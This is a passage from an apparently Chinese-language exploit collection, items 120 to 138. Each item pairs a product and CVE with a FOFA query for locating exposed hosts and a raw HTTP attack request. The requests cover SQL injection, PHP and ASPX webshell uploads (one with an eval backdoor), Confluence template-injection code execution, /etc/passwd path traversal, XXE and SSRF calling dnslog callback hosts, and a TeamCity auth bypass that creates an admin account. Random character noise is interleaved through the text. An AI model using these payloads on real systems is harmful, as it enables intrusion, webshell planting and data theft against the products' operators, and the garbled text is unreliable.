4 a# l0 E9 \% r1 pX-Remote-Ip: 1.1.1.1# `& c0 [ v s0 K2 s9 k) f# D
X-Remote-Addr: 1.1.1.10 c2 c' h! b1 g' ^/ x# E
Te: trailers
) B1 Q: L4 S9 ]3 i AConnection: close6 }& y1 C& B0 L0 e
% f! O: r8 M I% @ _, M
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
5 H" @8 I! M9 B, M; ~ F; ]0 U- _. I# F0 D. u5 o
/ b- m8 c/ b0 A, X120. 北京百绰智能S40管理平台导入web.php任意文件上传
0 Z+ X! k/ g% t1 P& SCVE-2024-1253
5 B0 v) q# u. OFOFA:title="Smart管理平台"0 Y# N# |1 K z5 z& e0 g9 R
POST /useratte/web.php? HTTP/1.1% L- y. R2 K: R- L5 R
Host: ip:port
2 u9 k- H' ?! MCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
4 U* M; x& B8 n* t- y9 _User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
' z: _$ L4 C; a' H0 v8 b* _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* D: Q* i% m5 i' EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 ]6 O8 J5 Q B0 D2 \Accept-Encoding: gzip, deflate( q4 C: P5 [: X3 F v
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
* x! y, |( r' y8 e9 uContent-Length: 597
- W& ~" P# n2 POrigin: https://ip:port
2 q" Q+ c; c7 |6 B/ ^Referer: https://ip:port/sysmanage/licence.php
1 X0 K" T0 o; m) r. i# a. p' }. uUpgrade-Insecure-Requests: 1
& g ^. i; \2 dSec-Fetch-Dest: document
+ p& _0 R4 g' U: q& j$ E+ F- FSec-Fetch-Mode: navigate3 R0 E$ H) k* ^8 n( l" ]
Sec-Fetch-Site: same-origin
/ g! T7 T* P- `Sec-Fetch-User: ?12 T& T, D9 g7 s
Te: trailers) b$ R2 o1 r& u4 D+ ?1 `
Connection: close
2 ]$ ^8 X. L" v1 w& y5 ]' F$ s( h: P" A9 i) ?$ A0 ^
-----------------------------42328904123665875270630079328
% Y9 S: t& m% q* d, o( u. d$ X/ oContent-Disposition: form-data; name="file_upload"; filename="2.php"
3 [4 M* v" n T1 J3 E' {9 j# OContent-Type: application/octet-stream+ B0 E' p8 x5 W+ ~; L3 c' w
+ w9 }, q! ]+ }5 R: v, M) ]<?php phpinfo()?>) F# t* [) Q5 w" D' H* q
-----------------------------42328904123665875270630079328! J3 ~. }( @6 t+ ~, ]0 Z
Content-Disposition: form-data; name="id_type"/ p. v* f2 L$ N& K5 D1 z I2 B
3 E* T v) d, I1 r7 B* d1/ v6 W% H, J) x6 ^/ @
-----------------------------42328904123665875270630079328
7 w0 o" {8 g, e: f& EContent-Disposition: form-data; name="1_ck"; M8 j S( W2 k, T, I& [; l! |
$ B$ P0 X( a/ n. K* F
1_radhttp
+ w- o# ^ ^) I/ f& ^3 I u. m-----------------------------42328904123665875270630079328
, Y' [: o5 U5 t5 i2 a7 jContent-Disposition: form-data; name="mode"# P Y2 }5 J2 ~! O& C
# ^" D6 r7 i1 Z- q# l/ simport( |+ R8 q& f. T6 y9 \" j/ x4 O( M
-----------------------------42328904123665875270630079328
3 L. T" n( i: ]" Z: @2 x) }9 q( q$ `% l8 p( [. p# \: _
6 J7 j7 Q% R* D, N$ ~文件路径/upload/2.php! K, x& ~3 l* [" g' t
- R/ B: f/ W k* I2 ?3 A" q
121. 北京百绰智能S42管理平台userattestation.php任意文件上传1 [. S5 U. z: d2 f: v
CVE-2024-1918
: x; R' C- L7 _0 hFOFA:title="Smart管理平台"/ s7 s* d! g2 P1 @% k8 ?% K
POST /useratte/userattestation.php HTTP/1.1
}5 o6 G1 p! ~: ]& {Host: 192.168.40.130:8443
7 O3 c+ {+ S& G: r# a" GCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50! V& K1 C9 |/ B0 n6 y" A4 J0 c
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
! S5 U1 W( p; f0 S! e$ ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 H% J0 p6 L# x+ e/ w/ AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ g. ]" N0 |' p* h: d6 U( A; p- t b. C
Accept-Encoding: gzip, deflate
4 Y, y/ f. @& Y, f" i0 `- mContent-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793289 f: N- l# a u3 G7 }
Content-Length: 592
& H5 I# N% d( e0 jOrigin: https://192.168.40.130:8443
+ o8 ^3 o0 z( X" u2 S IUpgrade-Insecure-Requests: 1; `# f4 [0 z6 Q) o0 m
Sec-Fetch-Dest: document
7 p, R4 j2 A. WSec-Fetch-Mode: navigate
2 D4 x% r/ P- j4 v. w/ s, h% OSec-Fetch-Site: same-origin! x; P2 ^+ Y0 d% n: g( d
Sec-Fetch-User: ?16 r0 ^* g0 w5 |) U9 \- h' S; E. d
Te: trailers
L6 W' g/ V5 dConnection: close% h, Z0 g$ N6 R
5 t5 H8 y& D8 a$ C8 B-----------------------------42328904123665875270630079328
# \ r [) V- ]- z* \4 j# XContent-Disposition: form-data; name="web_img"; filename="1.php"
: `3 ?. T1 x2 U0 d- |; L# iContent-Type: application/octet-stream6 o- ]( r2 H$ n
( i- i n* y& T/ ^2 `3 X<?php phpinfo();?>0 \& w. W. {9 H; _
-----------------------------423289041236658752706300793289 h9 @* c2 v2 R
Content-Disposition: form-data; name="id_type"
2 q! J; Z% b, l/ a7 H2 R, a( Q9 H0 W- J& Z' G9 G: s; {
1
2 E H/ o" Z+ o3 x0 Y6 [-----------------------------42328904123665875270630079328
1 j! l8 U6 s: L- ~Content-Disposition: form-data; name="1_ck"0 f# h1 O( N; H( H7 ?
, L+ p7 l& i8 p1 f1 O2 X1_radhttp" f4 x% A* t+ m& x& y6 u5 h
-----------------------------42328904123665875270630079328
6 w; }3 G8 U# x% E1 U: aContent-Disposition: form-data; name="hidwel"6 B( S$ c* N& R% y# l5 e# x
. T- ]7 z2 X/ O4 Mset p+ Y9 V* R1 {9 M/ b* u2 ] F
-----------------------------42328904123665875270630079328 B. v0 @. `9 [* l2 p0 t& I! P) x# u$ l
- H3 S8 `( C" `. l c) v4 F9 V- Y2 L; b8 h2 K4 e. \! z
boot/web/upload/weblogo/1.php
) y$ I4 R0 x0 i! u! ]
4 U% N6 h0 \) p+ X: J. ^7 i- D122. 北京百绰智能s200管理平台/importexport.php sql注入
8 ]! S2 ]5 P" YCVE-2024-27718FOFA:title="Smart管理平台"9 ^ a* b' e; U2 Q
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()* ]4 l8 r$ N: A
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
2 Q/ G& z4 \9 F! LHost: x.x.x.x$ e7 w. v1 U. k( F, P9 J
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
1 {# P( d |! U0 O7 L) GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
) x- O" Y ?0 e8 pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; A/ k- Y9 V3 b" K8 D5 T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% u u+ P P2 N) o" }* d6 rAccept-Encoding: gzip, deflate, br) G; z* N0 _% t+ v" t% _% \+ `
Upgrade-Insecure-Requests: 1
% \! r5 N$ c% F) U( N% ASec-Fetch-Dest: document( r* y1 S) `2 Z0 U' s2 Z& D/ A
Sec-Fetch-Mode: navigate
! b5 R0 y* @( D0 l9 `9 ~* RSec-Fetch-Site: none: G% R: b" [( E# v
Sec-Fetch-User: ?1
5 g* W; h7 [4 I, x8 L# BTe: trailers
0 Y$ D- m3 Y E7 UConnection: close
! }# |/ h( z+ ^. V+ {# p1 D
5 B4 z' S! ` A8 D+ o# D0 E2 O' S. a5 t. ~( h
123. Atlassian Confluence 模板注入代码执行* W" k, q% J3 ^3 J: M( I
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"- n% \9 r" |5 W, O2 w
POST /template/aui/text-inline.vm HTTP/1.1
2 W- l# {0 K4 D( J' j$ THost: localhost:8090
( S6 I6 E+ K4 z" H4 F/ e# NAccept-Encoding: gzip, deflate, br
3 T3 ]6 ~, O2 U0 TAccept: */*
. S) {" l9 w2 IAccept-Language: en-US;q=0.9,en;q=0.8
' ^) h+ f, L9 B/ D, B3 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36% M% T/ A1 T: j! D
Connection: close/ v$ R1 r6 B. {1 S
Content-Type: application/x-www-form-urlencoded
& t& r- u9 K A( i' K5 J' a! _ \' A A/ [4 T9 O8 d8 }
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))" t/ f( l( I2 Z( m8 I
W8 c; q, s# @/ h5 `
% `- U, p+ A, \3 }1 H" ?124. 湖南建研工程质量检测系统任意文件上传
! d; [$ o% U3 q4 E; A! U: J% ^3 GFOFA:body="/Content/Theme/Standard/webSite/login.css"
: U3 o7 u5 ~+ F2 L* bPOST /Scripts/admintool?type=updatefile HTTP/1.1 {' D2 P- [6 P% g+ c* U
Host: 192.168.40.130:8282
; [& }( n& F0 Y7 g+ y$ EUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.364 Z* E0 h3 @) X" e/ V) H
Content-Length: 72
, U; v& F- _# RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ v1 @, M4 Y9 S5 F% bAccept-Encoding: gzip, deflate, br4 G5 ?" f ]) `* S" _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 H% T/ {: c) V2 z
Connection: close) ^. v4 ^+ ~% H9 j
Content-Type: application/x-www-form-urlencoded
# g' g9 z3 ]2 Z% Q& ^; d; ^# T4 q# u5 z
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
1 Q# U2 l- ]& j, A8 ~- g) J) |# r/ E) p0 t9 @3 ?( m
/ y7 A0 _) A. f1 |8 Q0 ~* l2 p8 thttp://192.168.40.130:8282/Scripts/abcgcg.aspx
/ r5 B) ]+ ?7 {/ e8 S) R/ k0 i* }/ }! j
125. ConnectWise ScreenConnect身份验证绕过
C0 t9 E0 \: _" G$ Z4 t sCVE-2024-1709; \: z- H; E& {, f0 K
FOFA:icon_hash="-82958153"( y$ X* y7 c4 X5 x6 I3 ?
https://github.com/watchtowrlabs ... bypass-add-user-poc
# z n/ d5 _( R+ X# d. N' `, i5 i$ Z/ D. z9 \) m2 U/ t/ f
# U/ t: _# S# ?% t9 B3 ~( E( f9 R
使用方法
. v3 K1 b3 L2 r- `! E+ @. fpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
0 h* b( W" h |5 C4 k1 H
1 {7 x6 [6 U9 E: A& Z4 f$ E B8 k: L) N J- b D& M6 _
创建好用户后直接登录后台,可以执行系统命令。0 k' k7 P n Z" J7 i7 t7 U' q
/ ~9 Y' F, G* s D! q
126. Aiohttp 路径遍历
; n' @+ ]) U- J6 h6 EFOFA:title=="ComfyUI"4 u. ]" v9 r$ V6 v* M3 a |
GET /static/../../../../../etc/passwd HTTP/1.1) L! B: T- W" ^; K4 \* t+ T3 w/ d1 ~
Host: x.x.x.x
8 ^. e$ H6 {+ |+ M% nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
4 V* d- h f9 b$ D9 |Connection: close+ G7 k! Y, w. m
Accept: */*
. P. J8 g8 V0 d2 uAccept-Language: en
5 f0 k6 u% L7 P- E9 K: xAccept-Encoding: gzip
1 Z: C4 x% P& V9 z: W' w. h6 }; N
) x7 Q& r7 d7 p+ G: a) Q2 r9 C( M }: T' [0 W2 w
127. 广联达Linkworks DataExchange.ashx XXE
8 b5 q6 D8 h, S+ y; xFOFA:body="Services/Identification/login.ashx" : k+ X8 S0 e4 G# W+ `0 g4 Y
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
- i8 y! {, _5 vHost: 192.168.40.130:8888
# _# `% h7 H+ G- `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
% y1 P1 |. z8 W7 ]Content-Length: 415- M6 r h+ D7 _ \5 O0 z$ [$ I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) H7 a8 j4 C6 R3 S' S! r% kAccept-Encoding: gzip, deflate* L L+ ]5 ~' c' T& }9 d8 P$ E
Accept-Language: zh-CN,zh;q=0.9
1 L5 P1 @( r, L, X* q4 QConnection: close0 s8 t6 U! ?6 f b8 G
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
: H7 _7 A6 v, q- @Purpose: prefetch
! m4 c* M' w8 y$ z5 cSec-Purpose: prefetch;prerender
* z$ ]! ?" x- }! S7 \) v I& T* _0 ?. M6 s# K
------WebKitFormBoundaryJGgV5l5ta05yAIe0
) d6 h0 k+ i8 N FContent-Disposition: form-data;name="SystemName"
Y+ s ^2 i* ^+ N1 a8 P' I" I* f- L
BIM
4 X1 j2 g2 B( _------WebKitFormBoundaryJGgV5l5ta05yAIe0
( o7 W. T. Q- A* x4 |: \8 @. ~, MContent-Disposition: form-data;name="Params"9 U7 i- v6 l# _$ D
Content-Type: text/plain
, e t! I0 ~2 `- K( I# v4 P
6 s7 ~* w' N, r. i4 L* o<?xml version="1.0" encoding="UTF-8"?>, `- q0 Z, H3 J" b
<!DOCTYPE test [+ S' J( L. W- V% y9 Q
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">/ }6 m1 b0 M" C2 x) Q; n
]
! Q+ N% q2 `: _ J6 B>
0 t% R7 T/ T# a; ~' f% F<test>&t;</test>! M2 k, u8 ?& r/ ]. }2 p+ M4 i
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
' X% C2 } @, J O3 Y p8 |' d9 I7 k9 Y" q$ l2 x5 h8 Q
) x Q7 L3 R4 W% W1 G9 {' m$ e/ v" c* r, h' e! q8 m' T ^: b
128. Adobe ColdFusion 反序列化. k' ?! {9 Z1 `
CVE-2023-38203
0 G8 P" q# p$ ^/ Y" a9 p7 r5 n: nAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)+ M8 ]( M; ~! Q+ q9 L
FOFA:app="Adobe-ColdFusion"
4 T1 t7 R2 R1 g) `: P# s' E1 jPAYLOAD
: o9 _5 v3 H! S
3 a8 _9 c5 J* r( y; f129. Adobe ColdFusion 任意文件读取
2 [$ M7 B# U9 h. W0 N+ R6 x uCVE-2024-20767
% h- g; O+ Z( f2 ?FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
* p' T$ M# U8 d6 @0 P' y+ L第一步,获取uuid" L5 D+ \/ y8 Z& E9 P
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
! Z2 O# a2 j% _3 r) IHost: x.x.x.x. g, `& O1 H! @8 \. y" Z7 ^+ V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.365 V. q# c5 W. ?) i2 x, B2 \# M
Accept: */*
% c: @4 a) G, {. J2 |5 y. c1 VAccept-Encoding: gzip, deflate6 I( F7 Z7 n4 c0 q
Connection: close
1 k. f/ P7 ]" S& C; L+ A
& D; Q- _6 f) J6 o5 A+ v+ t) @ y3 {% }0 O1 D N4 l
第二步,读取/etc/passwd文件' V6 f! P9 R' A/ X9 [4 e! _
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1# w) R$ S) I; t2 {+ t1 D
Host: x.x.x.x
; V& l: o' r7 Q: d2 w: e5 b, ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36* J: i" W' I% Q! b u: N
Accept: */*
: f$ t1 g2 g6 a0 ]$ hAccept-Encoding: gzip, deflate( r% V" m V% r; ?3 J+ ~5 b) \$ P( i
Connection: close$ f) c" S0 W3 X( M8 K3 y4 d$ ]
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
+ q9 G9 i& ~/ y) o1 k3 `
$ Y. ?4 n& f& X: B# Q& B$ W8 H9 q/ d
8 D- z7 a' v$ m130. Laykefu客服系统任意文件上传0 ^& } m* x, C
FOFA:icon_hash="-334624619"; _ O: Z) s! U4 @2 g5 W
POST /admin/users/upavatar.html HTTP/1.1! F t5 h9 i1 K1 E) \
Host: 127.0.0.1
& Z3 g2 I7 J. m6 P& rAccept: application/json, text/javascript, */*; q=0.01
m7 h, M' S; M# H" cX-Requested-With: XMLHttpRequest. L( d( F$ }* Q8 ?% T x6 B/ I
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26 _: j% S9 F) d5 ?
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR |0 }% N6 M3 [! Z+ Q
Accept-Encoding: gzip, deflate$ j/ @9 \) N5 M, a9 l/ W
Accept-Language: zh-CN,zh;q=0.9% A/ @6 g/ |1 n
Cookie: user_name=1; user_id=30 j5 p; I3 s) u1 K* c( h2 D4 F
Connection: close
1 j/ c% O% z( g# E1 M8 H; ^( T0 ]7 r/ o$ d! b! x5 I) P1 O3 t1 v
------WebKitFormBoundary3OCVBiwBVsNuB2kR& c0 Q) b8 y4 x7 E
Content-Disposition: form-data; name="file"; filename="1.php"
) u Q8 |" G7 x- kContent-Type: image/png
! Z( z2 e* }' }) P- M 4 f) u$ I D3 ~* ]$ ^9 X
<?php phpinfo();@eval($_POST['sec']);?>
\5 L7 o' v _" T+ d8 h------WebKitFormBoundary3OCVBiwBVsNuB2kR--
$ `, {2 L- R' M/ h+ K/ s3 m( V/ Y3 T' C# W8 G# I9 U5 Q; x
: d7 Q/ ?1 J- z( l0 M8 G4 D9 V
131. Mini-Tmall <=20231017 SQL注入, t& A2 ^$ b" p; L; m
FOFA:icon_hash="-2087517259"
) S+ D% [0 K. I后台地址:http://localhost:8080/tmall/admin
3 r! w5 P+ v) S% C" i3 L/ X+ w/ ihttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)8 n+ E! E: t' ]+ [3 l
9 E9 t9 Q! O8 s: @- }) a7 d! _+ L
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
3 f0 p# H8 c/ A( u! V! g' N4 T* ~CVE-2024-27198
4 x4 G" Z2 r5 f' Y" zFOFA:body="Log in to TeamCity"
. D5 B/ _$ {5 e2 h2 N/ TPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1. M1 k" W1 ~# H% l/ d$ j: f
Host: 192.168.40.130:8111
% \! {" Z6 ]8 e K7 h$ J: `' Y6 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
- P- L" a3 f1 j% i( `4 N$ ?, HAccept: */*
" [$ m) E9 [' mContent-Type: application/json2 s3 U. e6 }# o, p l2 r+ b& |0 U
Accept-Encoding: gzip, deflate
0 u0 G! l: f+ x
) a' H; e# k5 a8 M) a{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
9 X* p+ d3 t- t+ ~
- _% J/ D' U: a1 S
, C& d# O! [! [; E) ^- s$ a5 RCVE-2024-27199: I: {, \+ U" d. G: ~9 z
/res/../admin/diagnostic.jsp, C( O7 G+ n& s8 @: K$ _( L
/.well-known/acme-challenge/../../admin/diagnostic.jsp
5 V) n- y. {" e/update/../admin/diagnostic.jsp
, y* x0 C' d' I& D2 g6 X
' k; c# R" v8 g4 R
" C! W$ q/ [* b* Z( }CVE-2024-27198-RCE.py
* r% I$ X0 `7 O& s& A0 [8 ?' x+ |# a5 y
133. H5 云商城 file.php 文件上传$ l) e! A: G" @0 z( c( G: F
FOFA:body="/public/qbsp.php"
3 B/ y6 Y0 I6 n: S! ^8 b. jPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1& b4 I% p* B& r9 x- N
Host: your-ip
) A& J! g/ `, YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
' g i6 f7 ]0 }/ j( b+ sContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
+ l3 J; h* `5 L$ r1 F4 G' o6 }, e( \
* U2 J) ]' X$ }1 p: n) q------WebKitFormBoundaryFQqYtrIWb8iBxUCx
2 q' ~8 h, b; n& E4 yContent-Disposition: form-data; name="file"; filename="rce.php"
w: D5 G& B! J5 y* WContent-Type: application/octet-stream
% R8 i* e; {0 ` ]! c; g# S 4 a9 N1 t, s; m- z+ W( @1 l
<?php system("cat /etc/passwd");unlink(__FILE__);?>
d6 s8 i6 H8 Y------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
" j$ x& d# J7 \$ q( `/ |0 X
" h3 r4 R2 J/ F" S' g
6 J4 f" U; f! e$ y6 y& ^3 `. d% v& d+ C# ]) y
134. 网康NS-ASG应用安全网关index.php sql注入, H+ U( L+ U& `1 z$ n7 V! d, j
CVE-2024-2330
. l9 U, }" |% r7 C! h8 [/ {' |8 t. ~Netentsec NS-ASG Application Security Gateway 6.3版本
1 U0 g4 a0 T* u' l4 SFOFA:app="网康科技-NS-ASG安全网关"
* K' _ q8 x" A! j ^- zPOST /protocol/index.php HTTP/1.1! o7 e3 h) l8 s1 b @- s
Host: x.x.x.x! D( }3 r- m' \6 M \2 @
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de3 S0 s7 A2 Q7 T2 Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
. v/ b- z" } u% d& H WAccept: */*
- T% w, X( `4 [; T h9 rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 C% [& E# U$ E, ?* Q$ tAccept-Encoding: gzip, deflate
5 U; X t% X% U, n* rSec-Fetch-Dest: empty8 C2 p7 C5 s/ _+ o5 ]2 D
Sec-Fetch-Mode: cors
. y* D% ^0 u/ z6 ^! JSec-Fetch-Site: same-origin
& W( e. ^: n' Y2 h @7 N2 rTe: trailers
# T9 ~, _" `4 j5 K) K" ~6 I8 pConnection: close5 T9 b. H/ L1 u6 G5 }! `* U
Content-Type: application/x-www-form-urlencoded2 U+ {: ^1 M1 E3 q2 E
Content-Length: 263
K9 L/ k9 x& _9 G! a8 ^3 f' m; K- V8 m" Z( c
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}( b0 j# I" d/ B; S# k
( ]0 G$ l1 y, E$ R& X; P! v; m3 ~. V
3 o/ C4 y: A0 p- D135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
% g7 W+ f# g. K" q( G4 A4 D! [* HCVE-2024-20227 h3 B; J( g8 O. l/ f& `$ r
Netentsec NS-ASG Application Security Gateway 6.3版本
7 \# ~" s+ L2 k# W! D- j6 M! bFOFA:app="网康科技-NS-ASG安全网关"1 G. F$ A: ~( r
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1; }% x* x' o- f# [
Host: x.x.x.x
9 V9 u+ Q: |1 D2 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
0 z% U& t6 R& W- t% K$ x. RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- ?1 P2 F. O; H3 n& BAccept-Encoding: gzip, deflate7 n. M* G8 X& O Y
Accept-Language: zh-CN,zh;q=0.92 M6 ?2 [2 ]( i% w5 J/ q/ @3 G) R
Connection: close
, R- p: W, [$ f3 \* m' k1 F7 ?1 }+ l( x: v# X5 `. Z
3 m% ~* |, J ^) R& C! G
136. NextChat cors SSRF
0 {% o/ `* ^& v# |CVE-2023-497858 j9 Y/ C- g1 J# @. h2 V# t- x
FOFA:title="NextChat"
; s) f* D! W; N* p3 ^$ K# a6 x% E0 w6 IGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
/ q; k6 ` g3 Z6 P$ YHost: x.x.x.x:10000
& k5 k9 x) A, sUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36+ `' _( a1 _4 h, K* h) H5 g) F
Connection: close7 x+ m" @( e E5 j/ G
Accept: */*
/ ^# `2 {/ \* ~4 i1 tAccept-Language: en# ~1 Y y" q( b4 H/ z; X4 \, z
Accept-Encoding: gzip
( i* u6 }( Z+ J! L+ Q2 K7 }) y, Y9 B- D8 \ e
, z! Z; o: v0 x) }. s+ k1 D4 f4 }137. 福建科立迅通信指挥调度平台down_file.php sql注入: T$ r4 j* ]9 K# q" A* ~; Y
CVE-2024-2620
$ h5 ]# H. c2 F( c+ n7 LFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"' E8 w+ y" y4 F* t9 e$ q
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
% I4 t: n% c5 {! W; _( a9 ^- p- r* ^Host: x.x.x.x* r0 N/ i% z: \0 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0* q- o( z9 _4 F& i1 V+ p6 d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, t0 L6 N5 l' D' r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. l* B( \+ c8 @8 |Accept-Encoding: gzip, deflate, br
5 H2 e' [. Y8 Z' c% PConnection: close; Z2 G k) ~. D1 n4 y1 p) F2 i* f
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
/ y- Y* \+ m* Y9 L7 U1 H+ }. {- uUpgrade-Insecure-Requests: 1
/ L. h5 |+ e) p% K" }& [" z; y
' e3 C; [+ ^# J/ \( g
1 D2 D5 t1 B0 j5 P: d138. 福建科立讯通信指挥调度平台pwd_update.php sql注入3 Q6 F5 L1 j7 W" ]( `
CVE-2024-2621
O; R* y" R4 U0 n" q1 VFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
6 ]5 i, p8 j: I+ F, f/ vGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1. h3 f5 o3 ^* p# Q1 N
Host: x.x.x.x
# J0 p' d7 l6 h! F. D; j2 w1 f0 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
) S8 \0 C! y4 u' y5 { }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" f) [# H6 T% q% x+ J$ h( p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 k- I/ F$ x* p! Q" `5 HAccept-Encoding: gzip, deflate, br
, u, D/ [7 w9 d5 D$ ~/ bConnection: close1 e8 \0 z: ?; C5 k0 I# m
Upgrade-Insecure-Requests: 1
